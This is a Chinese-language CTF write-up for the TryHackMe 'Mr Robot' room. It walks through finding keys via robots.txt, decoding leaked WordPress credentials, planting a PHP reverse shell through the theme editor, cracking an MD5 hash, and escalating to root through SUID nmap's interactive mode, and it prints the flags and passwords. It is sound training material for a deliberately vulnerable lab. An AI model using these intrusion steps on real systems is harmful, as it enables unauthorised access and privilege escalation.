Mr Robot CTF - HackMD

# Mr Robot CTF ![](https://i.imgur.com/mp5JwKO.png) ## 題目 [Mr Robot CTF](https://tryhackme.com/r/room/mrrobot) ### 通關條件 Can you root this Mr. Robot styled machine? This is a virtual machine meant for beginners/intermediate users. There are 3 hidden keys located on the machine, can you find them? ### 提示 #### key 1 Robots #### key 2 There's something fishy about this wordlist... Why is it so long? #### key 3 nmap ## 解題 ### Key 1 ``` ┌──(kali㉿kali)-[~] └─$ curl http://10.10.238.241/robots.txt User-agent: * fsocity.dic key-1-of-3.txt ┌──(kali㉿kali)-[~] └─$ curl http://10.10.238.241/key-1-of-3.txt 073403c8a58a1f80d943455fb30724b9 ``` :::info robots.txt 是一種存放於網站根目錄下的ASCII編碼的文字檔案，它通常告訴網路搜尋引擎的漫遊器（又稱網路蜘蛛），此網站中的哪些內容是不應被搜尋引擎的漫遊器取得的，哪些是可以被漫遊器取得的。 ::: 另外還有一個字典檔 `fscoity.dic` 後續應該會用到 ### Key 2 目錄掃描後發現在 `/license.txt` 中有一組帳號密碼 `elliot:ER28-0652` ``` ┌──(kali㉿kali)-[~] └─$ curl http://10.10.238.241/license what you do just pull code from Rapid9 or some s@#% since when did you become a script kitty? do you want a password or something? ZWxsaW90OkVSMjgtMDY1Mgo= ┌──(kali㉿kali)-[~] └─$ echo "ZWxsaW90OkVSMjgtMDY1Mgo=" | base64 --decode elliot:ER28-0652 ``` 在 `/wp-login.php` 可以看到 wordpress 的後台登入畫面，再使用這組帳號密碼登入後台成功登入後，安裝 [wordpress reverse shell plugin](https://github.com/4m3rr0r/Reverse-Shell-WordPress-Plugin) 取得 shell ![Screenshot 2025-01-24 at 14.59.06](https://hackmd.io/_uploads/Sk8Bc3edkl.png) 接下來尋找 `key-2-of-3.txt` ``` find / -name key-2-of-3.txt /home/robot/key-2-of-3.txt ``` 但這邊會發現沒辦法直接印出記事本的東西，應該是權限不足，在 `/home/robot/` 的路徑下還有另一個檔案 `password.raw-md5`，將它印出得到 robot 的密碼雜湊，並嘗試解密獲得密碼`abcdefghijklmnopqrstuvwxyz` ``` cat /home/robot/password.raw-md5 robot:c3fcd3d76192e4007dfb496cca67e13b ``` ![Screenshot 2025-01-24 at 15.05.00](https://hackmd.io/_uploads/rk_iohe_1x.png) 這邊之後不知道為什麼我的 shell 怪怪的，所以我找了別的 [reverse shell php](https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php) 並放在 404 的頁面（Wordpress的後台->Appearance->Editor），成功拿一個新的shell，並切換使用者變成 robot，成功拿到 key2 ``` $ su - robot Password: abcdefghijklmnopqrstuvwxyz $ whoami robot $ cd /home/robot/ $ ls key-2-of-3.txt password.raw-md5 $ cat ke* 822c73956184f694993bede3eb39f959 $ ``` ### Key 3 尋找可以提權的方法，發現 `nmap` 可以，與提示吻合 ``` $ find / -user root -perm -4000 -print 2>/dev/null /bin/ping /bin/umount /bin/mount /bin/ping6 /bin/su /usr/bin/passwd /usr/bin/newgrp /usr/bin/chsh /usr/bin/chfn /usr/bin/gpasswd /usr/bin/sudo /usr/local/bin/nmap /usr/lib/openssh/ssh-keysign /usr/lib/eject/dmcrypt-get-device /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper /usr/lib/pt_chown $ ``` 接下來透過 `nmap` 的 interactive 功能就可以拿到 key3 了 ``` $ nmap --interactive Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ ) Welcome to Interactive Mode -- press h <enter> for help nmap> !cat /root/*.txt !cat /root/*.txt 04787ddef27c3dee1ee161b21670b4e4 ```